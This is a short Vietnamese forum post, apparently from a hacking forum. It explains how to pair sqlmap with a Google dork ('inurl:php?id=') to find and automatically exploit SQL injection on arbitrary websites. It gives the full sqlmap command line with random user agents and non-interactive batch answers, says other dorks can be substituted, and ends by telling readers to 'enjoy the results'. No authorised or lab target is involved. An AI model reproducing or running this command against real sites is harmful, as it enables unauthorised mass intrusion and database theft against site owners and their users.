DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Sử dụng sqlmap và google dork để tìm và khai thác lỗi sql injection
Có một tùy chọn trong sqlmap mà ít người biết đến, đó là việc sử dụng kết quả tìm kiếm của google để tìm và khai thác lỗi sql injection. Trong bài viết này mình sẽ hướng dẫn các bạn cách kết hợp hai ccoong cụ này nhé.
[YOUTUBE]https://www.youtube.com/watch?v=2PxKNop0_P8[/YOUTUBE]
- Mở cmd và nhập lệnh: ipconfig /flushdns
- Chạy sqlmap với lệnh:
python sqlmap.py -g “inurl:”php?id=”” –random-agent -f –batch –answer=”extending=N,follow=N,keep=N,exploit=n”
Bạn có thể thay giá trị của tham số g với một giá trị dork khác. - Tận hưởng thành quả
[YOUTUBE]https://www.youtube.com/watch?v=2PxKNop0_P8[/YOUTUBE]